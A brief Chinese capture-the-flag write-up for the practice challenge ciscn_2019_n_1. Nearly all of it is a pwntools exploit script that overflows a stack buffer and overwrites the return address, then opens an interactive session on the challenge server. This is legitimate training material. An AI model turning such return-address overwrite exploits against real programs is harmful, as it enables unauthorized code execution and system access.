基础的栈溢出
    image.png
    image.png
    溢出再函数调用就可以获取权限

    1. from pwn import *
    3. context(os='linux', arch='amd64', log_level='debug')
    4. content = 0
    6. elf = ELF('ciscn_2019_n_1')
    7. system_plt = elf.plt["system"]
    8. cat_flag   = next(elf.search(b"cat /flag"))
    9. addr = 0x04006BE
    11. def main():
    12.     if content == 1:
    13.         peiqi = process('ciscn_2019_n_1')
    14.     else:
    15.         peiqi = remote("node3.buuoj.cn",27031)
    17.     payload = b'a' * (0x30 + 8) 
    18.     payload = payload + p64(addr)
    20.     peiqi.recvuntil("Let's guess the number.\n")
    21.     peiqi.sendline(payload)
    23.     peiqi.interactive()
    25. main()

    image.png